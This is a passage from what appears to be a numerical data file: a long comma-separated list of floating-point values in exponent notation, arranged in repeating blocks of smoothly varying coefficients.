0.38075072e-02,
0.19052560e-02,
-0.45109729e-04,
-0.20623163e-02,
-0.42746197e-02,
-0.69636726e-02,
-0.99668913e-02,
-0.10686405e-01,
0.29919144e-01,
0.33657782e-01,
0.38317338e-01,
0.43094639e-01,
0.47413833e-01,
0.50920542e-01,
0.53509615e-01,
0.55282630e-01,
0.56432150e-01,
0.57132918e-01,
0.57500545e-01,
0.57602141e-01,
0.57477590e-01,
0.57153169e-01,
0.56648072e-01,
0.55977501e-01,
0.55154376e-01,
0.54190353e-01,
0.53096451e-01,
0.51883381e-01,
0.50561778e-01,
0.49142279e-01,
0.47635533e-01,
0.46052203e-01,
0.44402875e-01,
0.42697888e-01,
0.40947042e-01,
0.39159160e-01,
0.37341885e-01,
0.35501439e-01,
0.33642113e-01,
0.31765264e-01,
0.29866640e-01,
0.27930658e-01,
0.25920473e-01,
0.23763975e-01,
0.21344284e-01,
0.18521296e-01,
0.15230944e-01,
0.11671958e-01,
0.83932094e-02,
0.59620556e-02,
0.43443809e-02,
0.29380166e-02,
0.13360849e-02,
-0.42020026e-03,
-0.22225457e-02,
-0.40951176e-02,
-0.61711343e-02,
-0.87360274e-02,
-0.11627702e-01,
-0.12245870e-01,
0.27632145e-01,
0.31087343e-01,
0.35394758e-01,
0.39812610e-01,
0.43809064e-01,
0.47056779e-01,
0.49458548e-01,
0.51108032e-01,
0.52182894e-01,
0.52844279e-01,
0.53198714e-01,
0.53307895e-01,
0.53208377e-01,
0.52924160e-01,
0.52472707e-01,
0.51867817e-01,
0.51121201e-01,
0.50243411e-01,
0.49244415e-01,
0.48133992e-01,
0.46921846e-01,
0.45617707e-01,
0.44231363e-01,
0.42772591e-01,
0.41251190e-01,
0.39676767e-01,
0.38058497e-01,
0.36404900e-01,
0.34723751e-01,
0.33022195e-01,
0.31306833e-01,
0.29583117e-01,
0.27853649e-01,
0.26114259e-01,
0.24346959e-01,
0.22509510e-01,
0.20522581e-01,
0.18262342e-01,
0.15582572e-01,
0.12412144e-01,
0.89437887e-02,
0.57348427e-02,
0.33833538e-02,
0.18811167e-02,
0.61761297e-03,
-0.83635934e-03,
-0.24498748e-02,
-0.41174246e-02,
-0.58653555e-02,
-0.78286622e-02,
-0.10294430e-01,
-0.13095230e-01,
-0.13630256e-01,
0.25520688e-01,
0.28714316e-01,
0.32696646e-01,
0.36782503e-01,
0.40480625e-01,
0.43488596e-01,
0.45716532e-01,
0.47250807e-01,
0.48255347e-01,
0.48878800e-01,
0.49219336e-01,
0.49333718e-01,
0.49255468e-01,
0.49006518e-01,
0.48602745e-01,
0.48056658e-01,
0.47378853e-01,
0.46578914e-01,
0.45665938e-01,
0.44648807e-01,
0.43536380e-01,
0.42337555e-01,
0.41061286e-01,
0.39716586e-01,
0.38312454e-01,
0.36857765e-01,
0.35361193e-01,
0.33831026e-01,
0.32275263e-01,
0.30701900e-01,
0.29118838e-01,
0.27533358e-01,
0.25950057e-01,
0.24367830e-01,
0.22775861e-01,
0.21148378e-01,
0.19438008e-01,
0.17566392e-01,
0.15416590e-01,
0.12849388e-01,
0.97933495e-02,
0.64339326e-02,
0.33275706e-02,
0.10872351e-02,
-0.28362754e-03,
-0.14064757e-02,
-0.27260752e-02,
-0.42158812e-02,
-0.57702521e-02,
-0.74158944e-02,
-0.92886547e-02,
-0.11677106e-01,
-0.14403825e-01,
-0.14870039e-01,
0.23571694e-01,
0.26523935e-01,
0.30206172e-01,
0.33985410e-01,
0.37407782e-01,
0.40193867e-01,
0.42260528e-01,
0.43687437e-01,
0.44625875e-01,
0.45212984e-01,
0.45539256e-01,
0.45656916e-01,
0.45596711e-01,
0.45378670e-01,
0.45017261e-01,
0.44523854e-01,
0.43908067e-01,
0.43178570e-01,
0.42343616e-01,
0.41411307e-01,
0.40389728e-01,
0.39287016e-01,
0.38111381e-01,
0.36871076e-01,
0.35574421e-01,
0.34229808e-01,
0.32845549e-01,
0.31430013e-01,
0.29991681e-01,
0.28539073e-01,
0.27080379e-01,
0.25622051e-01,
0.24167063e-01,
0.22712942e-01,
0.21250511e-01,
0.19763654e-01,
0.18227577e-01,
0.16602959e-01,
0.14823279e-01,
0.12781378e-01,
0.10339825e-01,
0.74180500e-02,
0.41875704e-02,
0.12003324e-02,
-0.92070986e-03,
-0.21659597e-02,
-0.31659470e-02,
-0.43731593e-02,
-0.57607451e-02,
-0.72222133e-02,
-0.87847579e-02,
-0.10585406e-01,
-0.12914552e-01,
-0.15580352e-01,
-0.15989216e-01,
0.21772955e-01,
0.24502428e-01,
0.27907638e-01,
0.31403694e-01,
0.34571216e-01,
0.37151974e-01,
0.39069071e-01,
0.40396009e-01,
0.41272413e-01,
0.41824844e-01,
0.42136710e-01,
0.42256072e-01,
0.42211138e-01,
0.42020235e-01,
0.41696560e-01,
0.41250426e-01,
0.40690560e-01,
0.40024836e-01,
0.39260726e-01,
0.38405582e-01,
0.37466776e-01,
0.36451757e-01,
0.35368055e-01,
0.34223344e-01,
0.33025496e-01,
0.31782612e-01,
0.30503126e-01,
0.29195679e-01,
0.27868953e-01,
0.26531136e-01,
0.25188750e-01,
0.23845278e-01,
0.22500057e-01,
0.21148371e-01,
0.19782964e-01,
0.18395819e-01,
0.16978383e-01,
0.15516935e-01,
0.13982293e-01,
0.12313342e-01,
0.10401287e-01,
0.81002032e-02,
0.53164582e-02,
0.22110264e-02,
-0.66281413e-03,
-0.26719193e-02,
-0.38054741e-02,
-0.47028475e-02,
-0.58184257e-02,
-0.71222009e-02,
-0.85073700e-02,
-0.10002246e-01,
-0.11745773e-01,
-0.14030821e-01,
-0.16646272e-01,
-0.17007222e-01,
0.20113155e-01,
0.22637051e-01,
0.25786523e-01,
0.29021049e-01,
0.31953044e-01,
0.34343820e-01,
0.36122233e-01,
0.37356097e-01,
0.38174324e-01,
0.38693711e-01,
0.38991190e-01,
0.39110996e-01,
0.39079025e-01,
0.38912032e-01,
0.38622018e-01,
0.38218360e-01,
0.37708975e-01,
0.37100986e-01,
0.36401182e-01,
0.35616249e-01,
0.34752883e-01,
0.33817910e-01,
0.32818370e-01,
0.31761579e-01,
0.30655265e-01,
0.29507659e-01,
0.28327364e-01,
0.27123058e-01,
0.25902657e-01,
0.24672238e-01,
0.23434937e-01,
0.22190256e-01,
0.20934626e-01,
0.19663457e-01,
0.18373784e-01,
0.17065847e-01,
0.15741942e-01,
0.14402619e-01,
0.13038933e-01,
0.11620902e-01,
0.10082259e-01,
0.83062556e-02,
0.61375611e-02,
0.34738728e-02,
0.47380762e-03,
-0.23008718e-02,
-0.42078327e-02,
-0.52424278e-02,
-0.60545313e-02,
-0.70956550e-02,
-0.83303098e-02,
-0.96523445e-02,
-0.11092181e-01,
-0.12791218e-01,
-0.15045415e-01,
-0.17619489e-01,
-0.17940814e-01,
0.18581720e-01,
0.20915883e-01,
0.23829265e-01,
0.26822245e-01,
0.29536562e-01,
0.31751547e-01,
0.33401374e-01,
0.34548633e-01,
0.35312355e-01,
0.35800364e-01,
0.36083620e-01,
0.36202855e-01,
0.36181841e-01,
0.36035892e-01,
0.35775941e-01,
0.35410490e-01,
0.34946699e-01,
0.34391019e-01,
0.33749603e-01,
0.33028524e-01,
0.32233991e-01,
0.31372394e-01,
0.30450473e-01,
0.29475490e-01,
0.28455326e-01,
0.27398327e-01,
0.26312927e-01,
0.25206672e-01,
0.24085123e-01,
0.22950860e-01,
0.21803081e-01,
0.20638589e-01,
0.19453924e-01,
0.18248010e-01,
0.17023819e-01,
0.15788162e-01,
0.14549590e-01,
0.13314429e-01,
0.12082065e-01,
0.10838719e-01,
0.95478874e-02,
0.81366943e-02,
0.64820210e-02,
0.44224774e-02,
0.18523625e-02,
-0.10648414e-02,
-0.37534775e-02,
-0.55650654e-02,
-0.65100682e-02,
-0.72507914e-02,
-0.82312562e-02,
-0.94086677e-02,
-0.10678349e-01,
-0.12073795e-01,
-0.13739666e-01,
-0.15975196e-01,
-0.18515551e-01,
-0.18804787e-01,
0.17168749e-01,
0.19327780e-01,
0.22023177e-01,
0.24793051e-01,
0.27306184e-01,
0.29358532e-01,
0.30889180e-01,
0.31955894e-01,
0.32668613e-01,
0.33126883e-01,
0.33396173e-01,
0.33513986e-01,
0.33502162e-01,
0.33374704e-01,
0.33141572e-01,
0.32810479e-01,
0.32387879e-01,
0.31879608e-01,
0.31291280e-01,
0.30628527e-01,
0.29897207e-01,
0.29103544e-01,
0.28254325e-01,
0.27356898e-01,
0.26419124e-01,
0.25448931e-01,
0.24453351e-01,
0.23437385e-01,
0.22403084e-01,
0.21349376e-01,
0.20273272e-01,
0.19171963e-01,
0.18045446e-01,
0.16897894e-01,
0.15737535e-01,
0.14574960e-01,
0.13420397e-01,
0.12280968e-01,
0.11158198e-01,
0.10045296e-01,
0.89227157e-02,
0.77492185e-02,
0.64479085e-02,
0.48916428e-02,
0.29151232e-02,
0.41272587e-03,
-0.24413855e-02,
-0.50533284e-02,
-0.67725605e-02,
-0.76342914e-02,
-0.83150435e-02,
-0.92462925e-02,
-0.10376302e-01,
-0.11603034e-01,
-0.12963645e-01,
-0.14606736e-01,
-0.16835131e-01,
-0.19348454e-01,
-0.19612487e-01,
0.15865134e-01,
0.17862506e-01,
0.20356622e-01,
0.22920400e-01,
0.25247563e-01,
0.27149413e-01,
0.28569562e-01,
0.29561354e-01,
0.30226331e-01,
0.30656436e-01,
0.30912070e-01,
0.31027781e-01,
0.31023609e-01,
0.30912362e-01,
0.30703111e-01,
0.30402854e-01,
0.30017478e-01,
0.29552329e-01,
0.29012615e-01,
0.28403712e-01,
0.27731372e-01,
0.27001891e-01,
0.26222091e-01,
0.25399221e-01,
0.24540421e-01,
0.23651907e-01,
0.22738006e-01,
0.21800319e-01,
0.20837659e-01,
0.19847298e-01,
0.18827075e-01,
0.17777784e-01,
0.16704248e-01,
0.15615269e-01,
0.14521973e-01,
0.13435473e-01,
0.12364727e-01,
0.11315233e-01,
0.10288181e-01,
0.92796814e-02,
0.82787825e-02,
0.72630350e-02,
0.61889994e-02,
0.49772034e-02,
0.34969368e-02,
0.15794969e-02,
-0.87806711e-03,
-0.36851568e-02,
-0.62257764e-02,
-0.78527220e-02,
-0.86356523e-02,
-0.92662042e-02,
-0.10158284e-01,
-0.11249557e-01,
-0.12441714e-01,
-0.13776368e-01,
-0.15406553e-01,
-0.17638773e-01,
-0.20130811e-01,
-0.20375945e-01,
0.14662431e-01,
0.16510550e-01,
0.18818781e-01,
0.21192145e-01,
0.23347380e-01,
0.25109937e-01,
0.26427617e-01,
0.27349673e-01,
0.27969934e-01,
0.28373329e-01,
0.28615609e-01,
0.28728599e-01,
0.28730700e-01,
0.28633634e-01,
0.28445678e-01,
0.28173234e-01,
0.27821736e-01,
0.27396221e-01,
0.26901733e-01,
0.26343603e-01,
0.25727598e-01,
0.25059966e-01,
0.24347208e-01,
0.23595579e-01,
0.22810331e-01,
0.21994932e-01,
0.21150416e-01,
0.20275565e-01,
0.19368108e-01,
0.18426621e-01,
0.17452605e-01,
0.16451407e-01,
0.15432071e-01,
0.14405738e-01,
0.13383573e-01,
0.12374919e-01,
0.11386278e-01,
0.10420920e-01,
0.94791828e-02,
0.85583618e-02,
0.76520443e-02,
0.67478423e-02,
0.58222217e-02,
0.48302943e-02,
0.36898023e-02,
0.22657616e-02,
0.38620809e-03,
-0.20464570e-02,
-0.48193890e-02,
-0.72907535e-02,
-0.88232690e-02,
-0.95311515e-02,
-0.10120570e-01,
-0.10982438e-01,
-0.12042844e-01,
-0.13208187e-01,
-0.14525170e-01,
-0.16151898e-01,
-0.18398402e-01,
-0.20873869e-01,
-0.21105917e-01,
0.13552637e-01,
0.15262923e-01,
0.17399436e-01,
0.19596824e-01,
0.21593064e-01,
0.23226669e-01,
0.24449309e-01,
0.25306473e-01,
0.25884863e-01,
0.26262935e-01,
0.26492154e-01,
0.26601870e-01,
0.26609030e-01,
0.26524415e-01,
0.26355645e-01,
0.26108669e-01,
0.25788641e-01,
0.25400463e-01,
0.24949163e-01,
0.24440058e-01,
0.23878768e-01,
0.23270955e-01,
0.22621866e-01,
0.21935685e-01,
0.21214921e-01,
0.20460036e-01,
0.19669790e-01,
0.18842377e-01,
0.17977156e-01,
0.17076379e-01,
0.16145866e-01,
0.15194753e-01,
0.14234038e-01,
0.13274660e-01,
0.12325864e-01,
0.11394359e-01,
0.10484057e-01,
0.95965564e-02,
0.87314118e-02,
0.78865895e-02,
0.70581776e-02,
0.62391688e-02,
0.54168063e-02,
0.45667454e-02,
0.36422682e-02,
0.25576062e-02,
0.11724485e-02,
-0.68855018e-03,
-0.31142109e-02,
-0.58629848e-02,
-0.82644373e-02,
-0.96990969e-02,
-0.10335494e-01,
-0.10892544e-01,
-0.11732457e-01,
-0.12769138e-01,
-0.13914877e-01,
-0.15221934e-01,
-0.16854212e-01,
-0.19125070e-01,
-0.21587910e-01,
-0.21812512e-01,
0.12528375e-01,
0.14111324e-01,
0.16089143e-01,
0.18123835e-01,
0.19972973e-01,
0.21487134e-01,
0.22621555e-01,
0.23418266e-01,
0.23957409e-01,
0.24311502e-01,
0.24528088e-01,
0.24634261e-01,
0.24645658e-01,
0.24572272e-01,
0.24421265e-01,
0.24198342e-01,
0.23908518e-01,
0.23556618e-01,
0.23147549e-01,
0.22686291e-01,
0.22177676e-01,
0.21625938e-01,
0.21034168e-01,
0.20403879e-01,
0.19734910e-01,
0.19025959e-01,
0.18275727e-01,
0.17484382e-01,
0.16654858e-01,
0.15793348e-01,
0.14909030e-01,
0.14012692e-01,
0.13114928e-01,
0.12224767e-01,
0.11348879e-01,
0.10491370e-01,
0.96542966e-02,
0.88380333e-02,
0.80419006e-02,
0.72643128e-02,
0.65027624e-02,
0.57532680e-02,
0.50087180e-02,
0.42559886e-02,
0.34697335e-02,
0.26006724e-02,
0.15582409e-02,
0.19586713e-03,
-0.16648462e-02,
-0.41000666e-02,
-0.68322704e-02,
-0.91604441e-02,
-0.10493010e-01,
-0.11061922e-01,
-0.11595163e-01,
-0.12420692e-01,
-0.13440105e-01,
-0.14572812e-01,
-0.15877264e-01,
-0.17524028e-01,
-0.19829245e-01,
-0.22282675e-01,
-0.22505168e-01,
0.11582712e-01,
0.13047962e-01,
0.14879054e-01,
0.16763248e-01,
0.18476224e-01,
0.19879704e-01,
0.20932244e-01,
0.21672688e-01,
0.22175148e-01,
0.22506684e-01,
0.22711273e-01,
0.22814000e-01,
0.22829419e-01,
0.22766909e-01,
0.22633271e-01,
0.22434004e-01,
0.22174012e-01,
0.21857906e-01,
0.21490037e-01,
0.21074377e-01,
0.20614149e-01,
0.20111440e-01,
0.19566908e-01,
0.18979838e-01,
0.18348834e-01,
0.17672971e-01,
0.16953107e-01,
0.16192837e-01,
0.15398719e-01,
0.14579884e-01,
0.13746735e-01,
0.12909485e-01,
0.12076905e-01,
0.11255554e-01,
0.10449625e-01,
0.96614184e-02,
0.88916803e-02,
0.81402799e-02,
0.74064764e-02,
0.66891308e-02,
0.59866421e-02,
0.52965824e-02,
0.46150312e-02,
0.39348379e-02,
0.32422331e-02,
0.25101355e-02,
0.16859862e-02,
0.67323016e-03,
-0.68223715e-03,
-0.25608686e-02,
-0.50209761e-02,
-0.77415816e-02,
-0.99905552e-02,
-0.11216282e-01,
-0.11722405e-01,
-0.12240239e-01,
-0.13058126e-01,
-0.14066087e-01,
-0.15192053e-01,
-0.16501144e-01,
-0.18171404e-01,
-0.20520791e-01,
-0.22966992e-01,
-0.23192288e-01,
0.10709423e-01,
0.12065823e-01,
0.13761187e-01,
0.15506121e-01,
0.17093049e-01,
0.18394005e-01,
0.19370625e-01,
0.20058842e-01,
0.20527244e-01,
0.20837912e-01,
0.21031609e-01,
0.21131653e-01,
0.21151649e-01,
0.21100447e-01,
0.20984545e-01,
0.20809161e-01,
0.20578744e-01,
0.20297162e-01,
0.19967660e-01,
0.19592566e-01,
0.19173032e-01,
0.18708948e-01,
0.18199200e-01,
0.17642427e-01,
0.17038029e-01,
0.16387362e-01,
0.15694451e-01,
0.14966104e-01,
0.14211375e-01,
0.13440318e-01,
0.12662663e-01,
0.11886760e-01,
0.11119010e-01,
0.10363686e-01,
0.96232807e-02,
0.88988189e-02,
0.81905108e-02,
0.74980101e-02,
0.68207132e-02,
0.61578541e-02,
0.55083996e-02,
0.48709009e-02,
0.42431629e-02,
0.36212225e-02,
0.29974312e-02,
0.23571376e-02,
0.16709621e-02,
0.88186091e-03,
-0.11385441e-03,
-0.14786492e-02,
-0.33936626e-02,
-0.58928211e-02,
-0.86036716e-02,
-0.10764806e-01,
-0.11878857e-01,
-0.12327690e-01,
-0.12838322e-01,
-0.13654754e-01,
-0.14656777e-01,
-0.15782116e-01,
-0.17102929e-01,
-0.18805560e-01,
-0.21208614e-01,
-0.23648826e-01,
-0.23881109e-01,
0.99031366e-02,
0.11158862e-01,
0.12728675e-01,
0.14344782e-01,
0.15815102e-01,
0.17021233e-01,
0.17927697e-01,
0.18567791e-01,
0.19005040e-01,
0.19296985e-01,
0.19481450e-01,
0.19580156e-01,
0.19605840e-01,
0.19566806e-01,
0.19469030e-01,
0.19317091e-01,
0.19114554e-01,
0.18864036e-01,
0.18567108e-01,
0.18224217e-01,
0.17834747e-01,
0.17397350e-01,
0.16910696e-01,
0.16374495e-01,
0.15790507e-01,
0.15163027e-01,
0.14498919e-01,
0.13806998e-01,
0.13096904e-01,
0.12377877e-01,
0.11657882e-01,
0.10943062e-01,
0.10237600e-01,
0.95441425e-02,
0.88640014e-02,
0.81976959e-02,
0.75451867e-02,
0.69061988e-02,
0.62803319e-02,
0.56670737e-02,
0.50658169e-02,
0.44758078e-02,
0.38957228e-02,
0.33232321e-02,
0.27542519e-02,
0.21804536e-02,
0.15856215e-02,
0.93752530e-03,
0.17370789e-03,
-0.81816822e-03,
-0.22095586e-02,
-0.41797617e-02,
-0.67304755e-02,
-0.94296988e-02,
-0.11491459e-01,
-0.12489353e-01,
-0.12887697e-01,
-0.13399359e-01,
-0.14220017e-01,
-0.15221213e-01,
-0.16351623e-01,
-0.17690992e-01,
-0.19434931e-01,
-0.21900531e-01,
-0.24334403e-01,
-0.24576908e-01,
0.91596041e-02,
0.10322293e-01,
0.11776099e-01,
0.13273214e-01,
0.14635916e-01,
0.15754675e-01,
0.16596718e-01,
0.17192930e-01,
0.17602194e-01,
0.17877869e-01,
0.18055072e-01,
0.18153975e-01,
0.18186348e-01,
0.18159697e-01,
0.18079169e-01,
0.17948311e-01,
0.17769367e-01,
0.17543392e-01,
0.17270328e-01,
0.16949220e-01,
0.16578663e-01,
0.16157566e-01,
0.15685990e-01,
0.15165905e-01,
0.14601668e-01,
0.14000042e-01,
0.13369541e-01,
0.12719298e-01,
0.12057992e-01,
0.11393145e-01,
0.10730589e-01,
0.10074451e-01,
0.94274255e-02,
0.87909503e-02,
0.81658233e-02,
0.75523388e-02,
0.69505223e-02,
0.63602584e-02,
0.57813367e-02,
0.52134916e-02,
0.46564899e-02,
0.41098930e-02,
0.35728957e-02,
0.30442516e-02,
0.25214758e-02,
0.19998695e-02,
0.14702382e-02,
0.91451913e-03,
0.29673893e-03,
-0.45211281e-03,
-0.14543475e-02,
-0.28908835e-02,
-0.49353936e-02,
-0.75476863e-02,
-0.10228912e-01,
-0.12177330e-01,
-0.13055839e-01,
-0.13411977e-01,
-0.13932705e-01,
-0.14762470e-01,
-0.15767431e-01,
-0.16908331e-01,
-0.18272618e-01,
-0.20066334e-01,
-0.22602497e-01,
-0.25027955e-01,
-0.25282444e-01,
0.84757134e-02,
0.95526502e-02,
0.10899562e-01,
0.12287115e-01,
0.13550865e-01,
0.14589507e-01,
0.15372781e-01,
0.15929360e-01,
0.16313823e-01,
0.16575595e-01,
0.16747160e-01,
0.16847055e-01,
0.16885890e-01,
0.16870106e-01,
0.16803687e-01,
0.16688865e-01,
0.16526472e-01,
0.16316228e-01,
0.16057082e-01,
0.15747746e-01,
0.15387391e-01,
0.14976392e-01,
0.14516956e-01,
0.14013476e-01,
0.13472388e-01,
0.12901680e-01,
0.12309901e-01,
0.11705250e-01,
0.11094769e-01,
0.10483908e-01,
0.98766321e-02,
0.92755975e-02,
0.86824028e-02,
0.80980305e-02,
0.75229523e-02,
0.69574793e-02,
0.64018168e-02,
0.58560292e-02,
0.53201127e-02,
0.47941157e-02,
0.42779413e-02,
0.37713288e-02,
0.32739611e-02,
0.27850254e-02,
0.23029358e-02,
0.18249402e-02,
0.13457378e-02,
0.85484359e-03,
0.33187922e-03,
-0.26360160e-03,
-0.10086164e-02,
-0.20368681e-02,
-0.35384803e-02,
-0.56763412e-02,
-0.83571654e-02,
-0.11009140e-01,
-0.12828228e-01,
-0.13585953e-01,
-0.13909469e-01,
-0.14446771e-01,
-0.15289789e-01,
-0.16302353e-01,
-0.17458308e-01,
-0.18853234e-01,
-0.20704713e-01,
-0.23318050e-01,
-0.25730822e-01,
-0.25997423e-01,
0.78488868e-02,
0.88471249e-02,
0.10095963e-01,
0.11383073e-01,
0.12556248e-01,
0.13521745e-01,
0.14251599e-01,
0.14772387e-01,
0.15134628e-01,
0.15383984e-01,
0.15550311e-01,
0.15650392e-01,
0.15693463e-01,
0.15684696e-01,
0.15626790e-01,
0.15520756e-01,
0.15366406e-01,
0.15162837e-01,
0.14909022e-01,
0.14604477e-01,
0.14249890e-01,
0.13847613e-01,
0.13401926e-01,
0.12918934e-01,
0.12406076e-01,
0.11871213e-01,
0.11321891e-01,
0.10764673e-01,
0.10204747e-01,
0.96458644e-02,
0.90905391e-02,
0.85403854e-02,
0.79964781e-02,
0.74595166e-02,
0.69300104e-02,
0.64083328e-02,
0.58948221e-02,
0.53897803e-02,
0.48935004e-02,
0.44061504e-02,
0.39277528e-02,
0.34583132e-02,
0.29976317e-02,
0.25451381e-02,
0.20998786e-02,
0.16600611e-02,
0.12224072e-02,
0.78081363e-03,
0.32335857e-03,
-0.17330737e-03,
-0.75507897e-03,
-0.15084407e-02,
-0.25801368e-02,
-0.41686138e-02,
-0.64185774e-02,
-0.91707250e-02,
-0.11776590e-01,
-0.13448806e-01,
-0.14086716e-01,
-0.14388485e-01,
-0.14948927e-01,
-0.15807996e-01,
-0.16831016e-01,
-0.18005654e-01,
-0.19435892e-01,
-0.21352261e-01,
-0.24047775e-01,
-0.26441328e-01,
-0.26718097e-01,
0.72761136e-02,
0.82024941e-02,
0.93617616e-02,
0.10557142e-01,
0.11647610e-01,
0.12546310e-01,
0.13227314e-01,
0.13715181e-01,
0.14056569e-01,
0.14293512e-01,
0.14453239e-01,
0.14550695e-01,
0.14593684e-01,
0.14586142e-01,
0.14529741e-01,
0.14424738e-01,
0.14270628e-01,
0.14066807e-01,
0.13813181e-01,
0.13510717e-01,
0.13161879e-01,
0.12770806e-01,
0.12343196e-01,
0.11885820e-01,
0.11405828e-01,
0.10910179e-01,
0.10404940e-01,
0.98949000e-02,
0.93836067e-02,
0.88735307e-02,
0.83662188e-02,
0.78627151e-02,
0.73637851e-02,
0.68700551e-02,
0.63821264e-02,
0.59005306e-02,
0.54257177e-02,
0.49582440e-02,
0.44985944e-02,
0.40470236e-02,
0.36037776e-02,
0.31689804e-02,
0.27423929e-02,
0.23237155e-02,
0.19122795e-02,
0.15068311e-02,
0.11052121e-02,
0.70368673e-03,
0.29509133e-03,
-0.13425731e-03,
-0.61128259e-03,
-0.11886779e-02,
-0.19643204e-02,
-0.30994283e-02,
-0.47985963e-02,
-0.71782242e-02,
-0.99987285e-02,
-0.12535306e-01,
-0.14042607e-01,
-0.14564627e-01,
-0.14856030e-01,
-0.15444703e-01,
-0.16321121e-01,
-0.17356047e-01,
-0.18551625e-01,
-0.20020738e-01,
-0.22008330e-01,
-0.24788912e-01,
-0.27153788e-01,
-0.27435988e-01,
0.67528659e-02,
0.76138428e-02,
0.86914934e-02,
0.98031582e-02,
0.10817948e-01,
0.11655207e-01,
0.12290766e-01,
0.12747228e-01,
0.13067597e-01,
0.13290452e-01,
0.13440499e-01,
0.13530949e-01,
0.13568352e-01,
0.13555742e-01,
0.13494246e-01,
0.13384038e-01,
0.13225075e-01,
0.13017694e-01,
0.12763139e-01,
0.12463950e-01,
0.12124085e-01,
0.11748808e-01,
0.11344243e-01,
0.10916842e-01,
0.10472860e-01,
0.10017826e-01,
0.95562525e-02,
0.90915291e-02,
0.86259460e-02,
0.81609664e-02,
0.76976661e-02,
0.72367843e-02,
0.67789229e-02,
0.63247578e-02,
0.58749435e-02,
0.54301512e-02,
0.49911011e-02,
0.45584417e-02,
0.41327197e-02,
0.37144551e-02,
0.33040245e-02,
0.29014633e-02,
0.25067537e-02,
0.21196145e-02,
0.17395143e-02,
0.13655368e-02,
0.99622435e-03,
0.62900473e-03,
0.25951708e-03,
-0.12054403e-03,
-0.52714220e-03,
-0.99177333e-03,
-0.15755766e-02,
-0.23898906e-02,
-0.36114564e-02,
-0.54468848e-02,
-0.79709487e-02,
-0.10849346e-01,
-0.13287026e-01,
-0.14611776e-01,
-0.15024997e-01,
-0.15317407e-01,
-0.15937271e-01,
-0.16830366e-01,
-0.17877102e-01,
-0.19094490e-01,
-0.20604689e-01,
-0.22668475e-01,
-0.25534086e-01,
-0.27857255e-01,
-0.28136132e-01,
0.62725060e-02,
0.70738452e-02,
0.80769034e-02,
0.91117928e-02,
0.10056756e-01,
0.10836687e-01,
0.11428916e-01,
0.11854174e-01,
0.12152059e-01,
0.12357980e-01,
0.12494393e-01,
0.12573079e-01,
0.12599719e-01,
0.12576928e-01,
0.12505878e-01,
0.12387235e-01,
0.12221836e-01,
0.12011216e-01,
0.11757963e-01,
0.11465836e-01,
0.11139663e-01,
0.10784952e-01,
0.10407481e-01,
0.10012860e-01,
0.96060764e-02,
0.91912504e-02,
0.87715685e-02,
0.83493032e-02,
0.79259127e-02,
0.75023416e-02,
0.70792502e-02,
0.66572730e-02,
0.62370505e-02,
0.58192150e-02,
0.54045119e-02,
0.49937805e-02,
0.45878929e-02,
0.41875835e-02,
0.37935111e-02,
0.34063701e-02,
0.30265125e-02,
0.26541308e-02,
0.22892184e-02,
0.19315761e-02,
0.15806772e-02,
0.12358783e-02,
0.89602108e-03,
0.55933301e-03,
0.22290465e-03,
-0.11837736e-03,
-0.47439354e-03,
-0.86409569e-03,
-0.13247277e-02,
-0.19277434e-02,
-0.28001412e-02,
-0.41344408e-02,
-0.61328700e-02,
-0.88115418e-02,
-0.11727598e-01,
-0.14030309e-01,
-0.15156906e-01,
-0.15471662e-01,
-0.15775396e-01,
-0.16426805e-01,
-0.17333917e-01,
-0.18390546e-01,
-0.19628605e-01,
-0.21180209e-01,
-0.23323257e-01,
-0.26269557e-01,
-0.28532716e-01,
-0.28793098e-01,
0.58267605e-02,
0.65732352e-02,
0.75074541e-02,
0.84711155e-02,
0.93507199e-02,
0.10076155e-01,
0.10626074e-01,
0.11019482e-01,
0.11292907e-01,
0.11478950e-01,
0.11598186e-01,
0.11661368e-01,
0.11673780e-01,
0.11638117e-01,
0.11556003e-01,
0.11428879e-01,
0.11258594e-01,
0.11047787e-01,
0.10800015e-01,
0.10519676e-01,
0.10211711e-01,
0.98812887e-02,
0.95334202e-02,
0.91725811e-02,
0.88025127e-02,
0.84261857e-02,
0.80457665e-02,
0.76626753e-02,
0.72779190e-02,
0.68921465e-02,
0.65058237e-02,
0.61194906e-02,
0.57338160e-02,
0.53495029e-02,
0.49673491e-02,
0.45883162e-02,
0.42133094e-02,
0.38431743e-02,
0.34787988e-02,
0.31207474e-02,
0.27695056e-02,
0.24253791e-02,
0.20884008e-02,
0.17583206e-02,
0.14347950e-02,
0.11171702e-02,
0.80453861e-03,
0.49563375e-03,
0.18838409e-03,
-0.12067244e-03,
-0.43773217e-03,
-0.77462569e-03,
-0.11541138e-02,
-0.16205981e-02,
-0.22580458e-02,
-0.32116263e-02,
-0.46886820e-02,
-0.68765748e-02,
-0.97123422e-02,
-0.12634131e-01,
-0.14760367e-01,
-0.15676778e-01,
-0.15906356e-01,
-0.16229935e-01,
-0.16910229e-01,
-0.17826060e-01,
-0.18888203e-01,
-0.20143216e-01,
-0.21733690e-01,
-0.23955522e-01,
-0.26971251e-01,
-0.29147699e-01,
-0.29363733e-01,
0.54070717e-02,
0.61022816e-02,
0.69719772e-02,
0.78685069e-02,
0.86859381e-02,
0.93587395e-02,
0.98667927e-02,
0.10227575e-01,
0.10474904e-01,
0.10638993e-01,
0.10738960e-01,
0.10784928e-01,
0.10782113e-01,
0.10733562e-01,
0.10641565e-01,
0.10508422e-01,
0.10336863e-01,
0.10130250e-01,
0.98925652e-02,
0.96282410e-02,
0.93418919e-02,
0.90379883e-02,
0.87205544e-02,
0.83929868e-02,
0.80580246e-02,
0.77177160e-02,
0.73734652e-02,
0.70262798e-02,
0.66767824e-02,
0.63254600e-02,
0.59727905e-02,
0.56192488e-02,
0.52654315e-02,
0.49121627e-02,
0.45603677e-02,
0.42109452e-02,
0.38648082e-02,
0.35230482e-02,
0.31864857e-02,
0.28557458e-02,
0.25313764e-02,
0.22137545e-02,
0.19029069e-02,
0.15987142e-02,
0.13008172e-02,
0.10086106e-02,
0.72139426e-03,
0.43811998e-03,
0.15723592e-03,
-0.12376621e-03,
-0.40906059e-03,
-0.70619176e-03,
-0.10294477e-02,
-0.14063339e-02,
-0.18904223e-02,
-0.25809507e-02,
-0.36431164e-02,
-0.52961027e-02,
-0.76976335e-02,
-0.10682030e-01,
-0.13564016e-01,
-0.15468677e-01,
-0.16168477e-01,
-0.16328586e-01,
-0.16677296e-01,
-0.17379910e-01,
-0.18295975e-01,
-0.19355783e-01,
-0.20619802e-01,
-0.22241637e-01,
-0.24535159e-01,
-0.27597541e-01,
-0.29646901e-01,
-0.29775085e-01,
0.50061666e-02,
0.56525916e-02,
0.64607500e-02,
0.72929878e-02,
0.80504669e-02,
